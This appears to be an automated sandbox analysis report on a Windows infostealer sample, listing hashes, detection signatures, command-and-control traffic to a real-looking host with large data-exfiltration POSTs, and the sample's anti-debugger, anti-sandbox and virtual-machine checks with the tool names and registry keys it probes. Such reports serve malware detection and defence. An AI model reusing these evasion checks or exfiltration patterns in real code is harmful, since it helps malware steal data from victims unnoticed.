
Windows Analysis Report
ZFttiy4Tt8.exe

Overview

General Information

Sample name: ZFttiy4Tt8.exe (renamed because the original name is a hash value)
Original sample name: 8cb06b0904107a21706822f2f2d90832.exe
Analysis ID: 1581610
MD5: 8cb06b0904107a21706822f2f2d90832
SHA1: 37dee7617a62f9a5e5853cc977a125be54ac58b7
SHA256: 05dd7b104f2c11892363053cfa4d3feed76b39614b34764ac571893b9495e2c4
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZFttiy4Tt8.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\ZFttiy4Tt8.exe" MD5: 8CB06B0904107A21706822F2F2D90832)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: ZFttiy4Tt8.exe | Avira: detected
Source: ZFttiy4Tt8.exe | Virustotal: Detection: 55%
Source: ZFttiy4Tt8.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: ZFttiy4Tt8.exe | Joe Sandbox ML: detected
Source: ZFttiy4Tt8.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E5A5B0 mov dword ptr [ebp+04h], 424D53FFh
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E5A7F0 mov dword ptr [ebx+04h], 424D53FFh
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E5A7F0 mov dword ptr [edi+04h], 424D53FFh
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E5A7F0 mov dword ptr [esi+04h], 424D53FFh
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E5B560 mov dword ptr [ebx+04h], 424D53FFh
Source: ZFttiy4Tt8.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 567271
Source: global traffic | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 143; Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d; Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 81.29.149.125
Source: Joe Sandbox View | IP Address: 3.218.7.103
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EBA8C0 recvfrom
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: httpbin.org; Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown | HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1; Host: home.fiveth5ht.top; Accept: */*; Content-Type: application/json; Content-Length: 567271
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: ZFttiy4Tt8.exe, 00000002.00000002.2289092739.0000000007510000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ZFttiy4Tt8.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: ZFttiy4Tt8.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443

System Summary

Source: ZFttiy4Tt8.exe | Static PE information: section name:
Source: ZFttiy4Tt8.exe | Static PE information: section name: .idata
Source: ZFttiy4Tt8.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E005B0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E06FA0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EBB180
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E2F100
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EC00E0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_0117A000
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_0117E050
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E56210
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EBC320
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EC0420
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01144410
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01156730
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01174780
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DFE620
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EBC770
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E04940
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DFA960
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EAC900
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_010AAB2C
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00FC6AC0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01168BF0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DFCBB0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00F84B60
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_010AAAC0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01174D40
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_0116CD80
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_0117CC90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01142F90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_0110AE30
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EBEF90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EB8F90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E14F70
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E010E6
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_011635B0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_0115D430
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_011817A0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_011456D0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01149920
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EA9880
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_01161BD0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E31BE0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00E34FD0 appears 232 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00DF71E0 appears 43 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00DFCAA0 appears 62 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00FA7220 appears 90 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00E34F40 appears 298 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00E35340 appears 41 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00E0CCD0 appears 53 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00E0CD40 appears 73 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00ED44A0 appears 62 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00DF73F0 appears 107 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00E350A0 appears 86 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00DF75A0 appears 627 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: String function: 00FCCBC0 appears 93 times
Source: ZFttiy4Tt8.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: ZFttiy4Tt8.exe | Static PE information: Section: ivnslrrb ZLIB complexity 0.9946421030405406
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00DF29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: ZFttiy4Tt8.exe | Virustotal: Detection: 55%
Source: ZFttiy4Tt8.exe | ReversingLabs: Detection: 60%
Source: ZFttiy4Tt8.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ZFttiy4Tt8.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Section loaded: kernel.appcore.dll
Source: ZFttiy4Tt8.exe | Static file information: File size 4528640 > 1048576
Source: ZFttiy4Tt8.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: ZFttiy4Tt8.exe | Static PE information: Raw size of ivnslrrb is bigger than: 0x100000 < 0x1c5400

Data Obfuscation

Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Unpacked PE file: 2.2.ZFttiy4Tt8.exe.df0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ivnslrrb:EW;jopxztyl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ivnslrrb:EW;jopxztyl:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: ZFttiy4Tt8.exe | Static PE information: real checksum: 0x45f077 should be: 0x455c78
Source: ZFttiy4Tt8.exe | Static PE information: section name:
Source: ZFttiy4Tt8.exe | Static PE information: section name: .idata
Source: ZFttiy4Tt8.exe | Static PE information: section name:
Source: ZFttiy4Tt8.exe | Static PE information: section name: ivnslrrb
Source: ZFttiy4Tt8.exe | Static PE information: section name: jopxztyl
Source: ZFttiy4Tt8.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_3_008C85DD push ds; ret 2_3_008C85E9
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_3_008CE559 push cs; iretd 2_3_008CE569
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_3_008C877C push edx; ret 2_3_008C8789
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_011741D0 push eax; mov dword ptr [esp], edx 2_2_011741D5
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E72340 push eax; mov dword ptr [esp], 00000000h 2_2_00E72343
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00EAC7F0 push eax; mov dword ptr [esp], 00000000h 2_2_00EAC743
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E30AC0 push eax; mov dword ptr [esp], 00000000h 2_2_00E30AC4
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E51430 push eax; mov dword ptr [esp], 00000000h 2_2_00E51433
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E739A0 push eax; mov dword ptr [esp], 00000000h 2_2_00E739A3
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00E4DAD0 push eax; mov dword ptr [esp], edx 2_2_00E4DAD1
Source: ZFttiy4Tt8.exe | Static PE information: section name: ivnslrrb entropy: 7.955475045686641

Boot Survival

Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 14D2403 second address: 14D2408 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16583C8 second address: 16583CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16583CC second address: 16583DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FB6E8B0C7E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16583DE second address: 16583E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1641328 second address: 1641338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007FB6E8B0C7E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 165750E second address: 1657514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1657514 second address: 1657531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1657531 second address: 1657536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1657536 second address: 1657550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 1657550 second address: 1657555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16576EE second address: 16576FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FB6E8B0C7E6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16576FD second address: 1657713 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jnp 00007FB6E8B0AEDEh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16595B6 second address: 16595BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 165962D second address: 1659635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 165976B second address: 165976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16597B8 second address: 16597D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 16597D1 second address: 16597DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB6E8B0C7E6h 0x0000000a rdtsc
